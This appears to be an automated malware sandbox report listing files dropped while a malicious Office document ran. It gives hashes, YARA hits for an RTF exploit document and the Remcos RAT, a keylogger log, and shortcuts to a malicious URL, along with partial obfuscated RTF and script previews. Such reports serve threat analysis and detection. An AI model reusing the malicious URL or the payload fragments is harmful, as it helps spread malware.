                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • 188.114.96.3
                  https://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxmGet hashmaliciousHTMLPhisherBrowse
                  • 172.67.159.233
                  https://forms.office.com/r/WH4W8hyyNAGet hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.97.3
                  No context
                  No context
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):131072
                  Entropy (8bit):0.025596317382011586
                  Encrypted:false
                  SSDEEP:6:I3DPczqNo4avxggLR8zaEWpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPHNktxvYg3J/
                  MD5:4A4581ABB108836C69D536D27E786247
                  SHA1:C867E0260C3DACE84362BAAF6BF34AEA0504E291
                  SHA-256:DB6F7275509A9D8130677A27CD9C5D0B5EDE8A3204A325FBB376E6AEDEB6C90A
                  SHA-512:D6B5CBBC6B6189BBE593B23963F1BAC0B0F5073D7FE8F15A31591C705CCBD89901CDE89692DD6C9DA0516C0D20F712134F812291AFF365A8CD6636BAEE6AF095
                  Malicious:false
                  Reputation:low
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4760
                  Entropy (8bit):4.834060479684549
                  Encrypted:false
                  SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                  MD5:838C1F472806CF4BA2A9EC49C27C2847
                  SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                  SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                  SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:@...e...........................................................
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Rich Text Format data, version 1
                  Category:dropped
                  Size (bytes):85983
                  Entropy (8bit):2.656661142867628
                  Encrypted:false
                  SSDEEP:384:AMNF0TJENLHnQiT6Bg1VCWsVdTLoTYq4UxggoYYxA7qYpxylSPA:fc1EpHQDgCJwvCvYYxAxylSPA
                  MD5:E03F3290788DE4D7A103F16B780B3CCE
                  SHA1:C220E79A2714ED59F4D7B1D0A4F6C63A03772EA6
                  SHA-256:DB4FED8FB3C35582ADE2FA57A5866EC7795E94BFF34F004F66D15233D1A2FCD8
                  SHA-512:9372B124ECB895A5C7672D75D17EB3EA3D91FAB5ED675AA82090D8D00C15CB4477553342A356C4F8616869C2987105E6468BB2A912196DAB055E06E34AD24B63
                  Malicious:true
                  Yara Hits:
                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc, Author: ditekSHen
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):962
                  Entropy (8bit):5.013811273052389
                  Encrypted:false
                  SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                  MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                  SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                  SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                  SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                  Malicious:false
                  Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):419812
                  Entropy (8bit):3.5814445916859183
                  Encrypted:false
                  SSDEEP:3072:FHGhwf2YFbhNe4VTdRnTT8w4TW7HqOOgVpp20KeLS7lixg36t+v4pNdS7ES:0wf2YFZHqf
                  MD5:94734CB139B6B9025FD8A1ACC56027DB
                  SHA1:B385368BCAADACA073849A413660B68E690FFBA5
                  SHA-256:7DDE4D5F845DBB2A078F6D0A290472D22CC845C6D6927CC0ADA645CE050C7B08
                  SHA-512:58E0064F4B304B5503C4A7E689D96CC62BAC4BC8EE76D39FEDE408B9E777B9602334DAD4E1570FA0B9E0C363E7D8EE419A41D4DA02493D174D61F96ACCA4053F
                  Malicious:false
                  Preview:..d.i.m. .p.l.a.t.i.n.a.m.i.n.a. .....p.l.a.t.i.n.a.m.i.n.a. .=. .m.e.l.e.a.n.t.e.....a.c.o.v.a.r.(.".m.a.r.a.n.h.a.r.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".d.r.u.p.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".i.n.d.i.g.e.n.a.t.o.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".m.u.l.h.e.r.i.n.h.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".a.n.t.r.o.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".m.a.s.c.a.r.a.d.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.9._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.1.0._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".L._.H.e.l.p.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):6088012
                  Entropy (8bit):2.787418529034627
                  Encrypted:false
                  SSDEEP:24576:sq+Ox34wayWx1+wGZjvat3wwKuWh1Owox:sq+Ox34wAx1+w0jvat3wwkh1Owg
                  MD5:21EDB7AE03A1C77AC0ED8B094677E4F5
                  SHA1:96448892CF82AC6556DD0AE2B5DB45EDC743FBC5
                  SHA-256:E52B52825EE8BAF57C9430F29A8D1BAFC58FF95DFC93E540DF7FE33E279940D2
                  SHA-512:1577CEFE8CE2B0AF658BA128763EFAECCC5390658AB46F7AA20B2FF73BB03752A253192EF8FD83942FA6FC7866E7CCEFC0D2041CB75BC86D180EF4D578AEED81
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):5935072
                  Entropy (8bit):2.6745845951535956
                  Encrypted:false
                  SSDEEP:12288:71cNPI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWwiD8dt3iGnjPjIt:7uNOR30wOSKx1Owiat3wwKuWh1OwuSH
                  MD5:50A7A55055F552E07590ED711C6EA98A
                  SHA1:F5163067A74A1C5F50413C85C52BD43F9426F698
                  SHA-256:493C5B42C889CEC9B2B5659703DB40CB6F06FD5D4F0FD2FE72BE8C3AD0A426DC
                  SHA-512:6B40B324896AB88E41E39AFF6CF78162EEF7CCF0D08636330642564898670F682404811DB20AA762AD9DAB59EBCF43164AA2AF5F0DCAF62A4DA5CB94027A0CD0
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):43432
                  Entropy (8bit):3.129229435071891
                  Encrypted:false
                  SSDEEP:384:/Usp7tZAxiFIsu5DKqaby3rZU+5D6fFC/9Vf6p:csppOVsuxdwgNUxW9NE
                  MD5:61C395110F84CFE31063007BEF8C5F2F
                  SHA1:DD43D9FFB48B091404EEAA8F00BC01E0AB0CB721
                  SHA-256:41D4E618784A475EBDB6C5C683CE780B869B6086F07B9980B1109881DCBEA8A4
                  SHA-512:4A80E35396934E953F34233DAAA200135303161FBCF40C87B000F60D7F85B50671F9ECC1D55D6A36CF0C7A7031B8D2D3A5E31423D4EBCF39EDA03BF733679A9A
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):6089288
                  Entropy (8bit):2.7861367732295585
                  Encrypted:false
                  SSDEEP:24576:XneC03wwKSKI1Tw7bHTat3wwKuWh1OwQ2:XneC03wwEI1TwHHTat3wwkh1Owr
                  MD5:312328140CF0503344FFC52CEAE47A36
                  SHA1:399423AAAD0CAB762FDE31D8F341BDE69DC4421F
                  SHA-256:1DC4BD2733ED7EC8ECDD67FC1577801FA308D951A5D77C2178AF357051EB1F54
                  SHA-512:898706A1321289A2C71C3E8F6B1593F8893A91565B1224BE070304FEFA28BE755E1D5FEB59D12925786D8D86E0EC33C0DAF39B5D19911706F1F91FEA3BECEF35
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Rich Text Format data, version 1
                  Category:dropped
                  Size (bytes):85983
                  Entropy (8bit):2.656661142867628
                  Encrypted:false
                  SSDEEP:384:AMNF0TJENLHnQiT6Bg1VCWsVdTLoTYq4UxggoYYxA7qYpxylSPA:fc1EpHQDgCJwvCvYYxAxylSPA
                  MD5:E03F3290788DE4D7A103F16B780B3CCE
                  SHA1:C220E79A2714ED59F4D7B1D0A4F6C63A03772EA6
                  SHA-256:DB4FED8FB3C35582ADE2FA57A5866EC7795E94BFF34F004F66D15233D1A2FCD8
                  SHA-512:9372B124ECB895A5C7672D75D17EB3EA3D91FAB5ED675AA82090D8D00C15CB4477553342A356C4F8616869C2987105E6468BB2A912196DAB055E06E34AD24B63
                  Malicious:true
                  Yara Hits:
                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc, Author: ditekSHen
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:{\rtf1........{\*\aoutl173498089 \"}.{\443609054`?:`'1=]2=]656[~8|#_@.0.%)5-|8,9,`!`5>@.>^><<`6^.~?~<;_?5.6(2.??888%4/&/>8;^'4!-8.$7^-6'*%038?9:|)/90~>1?!/]?:|54&?(!)^%.^&?2~3|3(|@7$]*^?9:&!+?[.8$,~]$&!92~#76_$+~_8./8^0???!8?@6%@-%'(8^%(;~8?,?41,9(6@%3.[:6#?$&4^?];@~*$?'+?03~?(;[>@`?%-4-?0*8;.?.8$]^.!/2.?9.^^2~];..?5?.6%.?5-/^|%.|%@/.:03,=9%?.@.!=>$2~%8$?.$?55%?>.;.@:3!7:?)?~@?41/<@/&?(2#?*<1,?`]*,1*^1!;6%7+]8..?895?10,%(?|-5`%.4?4+^-03$0]#*%~-5)'!02.@?(4%?.95#.^|?3%[947=2?$_.&`2.??[?)().;<.;??'_!3=?.):5=*.].=_[(-32%.'++|9?5?^_.>!1+!`;5?.<)27??~?1;9)_*0=(%=$89-%$]6![.%=&`0($..!++.%<%_68.|>7/.*|%]1&6<*-.?<9(420^(??@[.3.(%5'_?$5-$>%5<36:=#>)2&/51@$17?,0+(%>8+>%16!4|!(.`34|86.;&?%1.&|^7*?*;[+&;.:[12*%)]4./;6%*=./_!5?+;?@.~$~.[?%@=@.?.>+|>$&~#?383.'$^?<'5].7)~06^~.|.[0?&[:%?^^;,3?%`,:^0>-<6?=&|??]?`-&|/[`780&0|!..%$8!%)4&?_:|'.]#;[[.37&_1].:*)9:*$*%&=+?5`?5]($??#(:?!!3?)?;-6.<|-_.,&??+>-;'|:<?|)24,[,%(8.<?_@>:8?##-;?-6???)>.?4=]%?+/%54&??9?1]>5^&:2]4?'(9#.>6?6`9.;$#2+~..$[]`5$+1?9?(.<&[&87
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):15360
                  Entropy (8bit):5.680669291847939
                  Encrypted:false
                  SSDEEP:384:txPXxtqTDaPlxnqTDBP4xnqTDBPS4nqTDqPSxnGD:DbbRPRp2cR
                  MD5:84A13B86DF4B0BC5C3521A57CA0364C3
                  SHA1:91FE112E829D0BC1580BA13EECD882921AAFAC91
                  SHA-256:3A5E0FA9684F2EFB38D36A8CAD73D3A3B9885CEFAFFF0D5D11F590C60BCC3891
                  SHA-512:C7822A4FE2D26ED6D5B258F22F20BBBC20697B84420823C3CE8E3F256D3F570691401794E6ED48D9226F9E1D470445C9395B67074B2DE75D35E97A7C0A9E76D7
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):11776
                  Entropy (8bit):3.5211173719664557
                  Encrypted:false
                  SSDEEP:192:dTnJeularzhuqHMd9wMa831d3A6IaJC9ywaYAFC5LfeRVINpGSqkNIre71fR832t:diYqB83Q6XDYAFC5L2RVThkNIru583EZ
                  MD5:5F859B6DEA718E31DB2828D1E8395AFF
                  SHA1:A769A150736AA066D944BAF621A0004FA908C772
                  SHA-256:AFF1929488B6FB4A7B0317B259806443477025AE132E6711AAC5EC3480B07919
                  SHA-512:B4CE7E956F1CA683B78C299DAE597178DF6422EEA74259B5CA44A2936DF7C961B7468FC5BE5B426DF6839447350121EBB7E3A1D25BC84FE6DB61FDAE85BFAC13
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1024
                  Entropy (8bit):0.05390218305374581
                  Encrypted:false
                  SSDEEP:3:ol3lYdn:4Wn
                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                  Malicious:false
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):360
                  Entropy (8bit):3.5392076145810467
                  Encrypted:false
                  SSDEEP:6:6lVhlc65YcIeeDAl+XYwSySNombQDyFwfxNa/WAv:6lVwKeczwhykn50/W+
                  MD5:9FDCBE0BD419A77A95498ECCD1F9601A
                  SHA1:8F9B544C4EBAD2D4D873B7497704D97743868D63
                  SHA-256:27979894D5E1B8C0D1B78A9EF0ABE55750B52F66335E863FFAFAB91F8F2118BC
                  SHA-512:4E22BF8B655A6A4BA0A8EF15B31FFB4D2931936E49E44FB8A2889E69F37C1F8715E224D66E44423F1AF8963CD111396B2136E519DDC829EB485C05EC5CD7346A
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\note\nots.dat, Author: Joe Security
                  Preview:..[2024/07/26 07:08:59 Offline Keylogger Started]....[sA [Read-Only] [Compatibility Mode] - Microsoft Word]....[Microsoft Excel]....[New Tab - Google Chrome]....[Program Manager]..
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):131072
                  Entropy (8bit):0.025596317382011586
                  Encrypted:false
                  SSDEEP:6:I3DPczqNo4avxggLR8zaEWpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPHNktxvYg3J/
                  MD5:4A4581ABB108836C69D536D27E786247
                  SHA1:C867E0260C3DACE84362BAAF6BF34AEA0504E291
                  SHA-256:DB6F7275509A9D8130677A27CD9C5D0B5EDE8A3204A325FBB376E6AEDEB6C90A
                  SHA-512:D6B5CBBC6B6189BBE593B23963F1BAC0B0F5073D7FE8F15A31591C705CCBD89901CDE89692DD6C9DA0516C0D20F712134F812291AFF365A8CD6636BAEE6AF095
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):131072
                  Entropy (8bit):0.025496666854144305
                  Encrypted:false
                  SSDEEP:6:I3DPcUy5HvxggLRXx1AY3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPVy5P7TNvYg3J/
                  MD5:0413B0AC98609472FEA5235CD05F49E4
                  SHA1:A99B6BBFDCAA2E242907D852846C2064D40168FA
                  SHA-256:E5B52C21B11EA076BF2A296954E5DD56AF44935178AC4230B429CCFBC8EC4CA4
                  SHA-512:A57CA0BE61475CD7A108AD8E6E479BF88808204321CE36F454C0655DD5961726BC97C0DF736641BBC6650D39B201B223B065F27BB99181A1B0E52E392596ECF5
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):647168
                  Entropy (8bit):7.897723043776095
                  Encrypted:false
                  SSDEEP:12288:wF6xYtzOlYQlgr9+IUZF+x3kiuFBgANkAPQ7s1Q+A+cttStNW2JS2RLkH5:s6sKGQKr9+FZF+S0ANklw1Q1Ftt5R
                  MD5:8061EFD37F408B73FB8C34DE9D745BDD
                  SHA1:FF3A98EB6E3EA4F9A53681B066D44FB67D9B467B
                  SHA-256:A6005B3EC4FB7E0FBE3470765603968DF608CB9DD6BC29A43E97A7988D836696
                  SHA-512:A33DF292BA5215E658C92126B5AE7CAA6C0AA0E1AEA32C4F7BB65190884140FE6D88EE647FE6B7B27F6188D7148EFE1D6FD0635DE75AF45B317D6F171E1C0E55
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):647680
                  Entropy (8bit):7.919420373983589
                  Encrypted:false
                  SSDEEP:12288:RF6xYtzOlYQlgr9+IUZF+x3kiuFBgANkAPQ7s1Q+A+cttStNW2JS2RLkH5:D6sKGQKr9+FZF+S0ANklw1Q1Ftt5R
                  MD5:41B29466E337251CE8F6BEDB6C4EBCB2
                  SHA1:75B2748DE426AF12C513EFEA200C11F5CAADE7F1
                  SHA-256:E6C9517532AC17D9B6A98B14C2B7E65E8868A9FAE3BFB83C03B46D5A369F5FBA
                  SHA-512:58F877BF7B65D682D24185B77E13CF0B0D8BF84CFBC9990A8A9AB76259BB73FEF7080B046297DC1CB8E91EF762396582A994AB7793E42B7936A9E7F64120B5FC
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Generic INItialization configuration [xls]
                  Category:modified
                  Size (bytes):91
                  Entropy (8bit):4.7451174094964115
                  Encrypted:false
                  SSDEEP:3:bDycLOQXhb3dfpzCmMdFB3dfpzCv:bDDxjoJI
                  MD5:22DA60252D369C130962EA5A269366D6
                  SHA1:CF1A7DF2A02091420DA96BE2CEF0B19E0566DF6C
                  SHA-256:073C2157C06257A760538787E3F8829B4AC9E9B408FB95A81B54DDB660FB56E7
                  SHA-512:0DACFEEE7694FDDCB6CA1C47B27C31FD1D4295DE5C4001D054F9B3FBE1D7CF1BC892CB7DB9A32C73977383A2487ACF8051DAB2F872519DC3CEF7AE2789FED10F
                  Malicious:false
                  Preview:[folders]..sA.url=0..tny.wtf.url=0..AWD 490104998518.LNK=0..[xls]..AWD 490104998518.LNK=0..
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/sA>), ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):43
                  Entropy (8bit):4.414409522043331
                  Encrypted:false
                  SSDEEP:3:HRAbABGQYm/3LcmWjy:HRYFVm/3LOjy
                  MD5:DCF2C6BA6D31D8757A4131A6A7C3DDB8
                  SHA1:F49B7795E9EE7139609EAA674FF9606DE5A50544
                  SHA-256:801EEA495BE27F4F9509F7478C7B38316438F48CC57F7763ECB7BA2B4E8B295A
                  SHA-512:F8F5809A6EE32189A1F0AA5DDB46F220B400C6A35FF7BEBE9D059EBC3ABAAAB0183034BE4237D4E9343153D38D7F4AE899498CC905723798CFB711F24596862B
                  Malicious:true
                  Preview:[InternetShortcut]..URL=http://tny.wtf/sA..
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/>), ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):41
                  Entropy (8bit):4.2963379801223045
                  Encrypted:false
                  SSDEEP:3:HRAbABGQYm/3LcmWy:HRYFVm/3LOy
                  MD5:D591A53347F94FBC48B4B6A5CCE920ED
                  SHA1:C00082566F3211F9B1BBEC933A8AE164759C290A
                  SHA-256:1CA93696A94797C9411318830CAC6A5B26FEACC37D5CAA4B3742D722CD073781
                  SHA-512:BA14258049ABCC3E31AA3DFC3ABBC2949AF30BB73B031C0E408BCF036B51B7AC11E32C3B39A7952E1A007179720C970B29CB2DF8EF03A021EF3B59FEB5AE177E
                  Malicious:true
                  Preview:[InternetShortcut]..URL=http://tny.wtf/..
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.503835550707525
                  Encrypted:false
                  SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                  MD5:CB3D0F9D3F7204AF5670A294AB575B37
                  SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                  SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                  SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                  Malicious:false
                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):419812
                  Entropy (8bit):3.5814445916859183
                  Encrypted:false
                  SSDEEP:3072:FHGhwf2YFbhNe4VTdRnTT8w4TW7HqOOgVpp20KeLS7lixg36t+v4pNdS7ES:0wf2YFZHqf
                  MD5:94734CB139B6B9025FD8A1ACC56027DB
                  SHA1:B385368BCAADACA073849A413660B68E690FFBA5
                  SHA-256:7DDE4D5F845DBB2A078F6D0A290472D22CC845C6D6927CC0ADA645CE050C7B08
                  SHA-512:58E0064F4B304B5503C4A7E689D96CC62BAC4BC8EE76D39FEDE408B9E777B9602334DAD4E1570FA0B9E0C363E7D8EE419A41D4DA02493D174D61F96ACCA4053F
                  Malicious:true
